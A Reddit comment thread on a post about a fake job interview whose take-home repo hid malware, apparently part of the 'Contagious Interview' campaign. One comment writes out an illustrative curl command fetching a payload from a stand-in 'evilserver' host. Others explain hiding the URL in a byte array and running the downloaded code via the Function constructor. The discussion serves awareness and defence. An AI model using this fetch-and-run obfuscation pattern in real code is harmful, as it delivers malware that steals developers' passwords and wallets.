How I Almost Got Hacked By A 'Job Interview'
Posted by rchaudhary@reddit | programming | View on Reddit | 37 comments
Ameisen@reddit
Looked at some other posts, after noticing the rather blatant LLM prompt plug... saw this:
LLMs are not team members. They cannot think. They cannot reason.
gomihako_@reddit
You haven't met my team members...
ShinyHappyREM@reddit
It doesn't feel pity, or remorse, or fear. And it absolutely will not stop, ever!
FormerlyGruntled@reddit
Inexperienced team members can learn. LLMs will only spit out a different combination of words without knowledge of if it actually would work.
MostCredibleDude@reddit
The infuriating thing is when your boss demands AI usage, calls it like an army of junior devs, but guess what! You're responsible for your junior devs' code quality as if you did it yourself!
All the fake benefits of fake junior devs but nobody is allowed to blame the AI when it puts out garbage. And my output suffers because my blameless fake junior devs suck at their jobs.
no_brains101@reddit
I agree with this part of the comment at least? They are not magic this is true.
8J-QgvCfkqllcg@reddit
Alternate title: How I Missed Numerous Red Flags From A Fake Recruiter
kaddkaka@reddit
Which ones?
a_random_username@reddit
NineThreeFour1@reddit
I stopped reading right there.
OP is also an AI slop article spammer.
chat-lu@reddit
“Chief Blockchain Officer”
Globbi@reddit
...but he had inspirational quotes!
Akeshi@reddit
I hate this writing style, the only way I can think of describing it is "overconfidence"
mareek@reddit
How can anyone ignore those red flags?
BlueGoliath@reddit
It was the raccoon wasn't it?
Ameisen@reddit
That raccoon powers all LLMs.
techno156@reddit
The R in RAG stands for Raccoon.
BlueGoliath@reddit
Silent Hill dog ending but IRL and raccoons.
dethswatch@reddit
you think they don't have thumbs, but they do!
TonyCanHelp@reddit
This shady scam has been going for a while: https://medium.com/@pedro.domingues.pt/how-i-almost-got-hacked-by-a-linkedin-recruiter-40c466425e8a
qwaai@reddit
What?
Is this a web dev thing? I've never been asked to download and run stuff from a repo on my own system.
luxfx@reddit
Yep, very common. I've had some that were a shared VSCode session, some through web based repls, and some live. But a lot were of the "have this done before our call tomorrow" variety where you're supposed to fork a prepared repo and work off that. So the natural behavior is just treat it like any other project, download it into your projects folder, and work on it locally.
I wish I could say I would have caught this in time. But there's a very good chance I would have fallen for this. It's very sneaky.
ptoki@reddit
That just shows how immature webdev is. I would never ask anyone to use their resources at the interview. I always provided my own platform and either got the guy RDP and watched his work, or gave them control of my interview box (wiped clean after the session) over Teams.
I learn every day how stupid webdev is and I am discovering that the bottom is not the actual bottom...
vnordnet@reddit
Or maybe some people actually prefer take-homes? I’m a backend guy and I love them, because I get to show how I usually work and deliver on my own terms with low stress.
HoushouCoder@reddit
Ironically somewhat common in cybersecurity roles, in the form of bug bounties, or cracking challenges
SquirrelOtherwise723@reddit
It seems the most targeted libraries are from nodejs.
deanrihpee@reddit
I don't know, I'm web-dev adjacent, and yet my take-home assignment is one I write myself, commit, push and submit to the employer, not the other way around. The closest thing to be downloaded is probably a requirements or description document in PDF, but even then I just open it through the Gmail client, not download it.
Shogobg@reddit
Not web dev only - I’ve had “take-home” tests to work on a sample project for various positions.
badiparmagi@reddit
How come that script with the byte array stole everything on your PC like passwords, wallets etc? Please ELI5
YetAnotherRobert@reddit
If your script has "curl www.evilserver.com/payload.pl", it would catch your eye. If you use the numbers for 'w' and 'e' and 'v' and so on, it's less likely to catch your eye when scanning.
So next time, someone just puts those numbers into [ evil idea censored ] so it doesn't even catch your attention as a byte array - which also is a pretty rare thing to see in source so it DOES stand out anyway, but not as literally as the full sketchy domain + URL that's in the article's text.
Gotta admit, it's clever.
IAm_A_Complete_Idiot@reddit
The code takes the binary representation of a string, in utf-8. It then:
Function
constructor to create a function that holds all the code in that file. In the same way:
would evaluate to 7
would evaluate the code at malware.org.
YouSuffer@reddit
The byte array is decoded into a URL. Then the code downloads whatever's at that address and runs it. The downloaded malware is what goes through the user's PC and steals anything it can find.
fatoms@reddit
So they just breezed right past the obvious red flag "transforming real estate with blockchain". Bringing two scam infested industries together to spread the "love".
-nbsp-@reddit
Thanks for sharing. This is a campaign conducted by North Korean state sponsored hackers. The campaign is called Contagious Interview campaign. I really appreciate the author sharing the steps leading to the coding "task".
This has been going on for more than a year now. Large scale. Individual developers targeted at a time. There have been a few posts on reddit about it too!
Lots of security companies have released info on it in the past year but Socket just dropped a thesis:
https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages
Carnifex@reddit
Do we? Looks like ai to me
Gipetto@reddit
What timing. I got this beauty today in my spam folder:
I never applied with them, but I’ve been sending out a ton of resumes, so maybe. But install your CRM? Nah, I’ll pass on the malware…
levelstar01@reddit
I am not reading something written in LinkedIn Standard English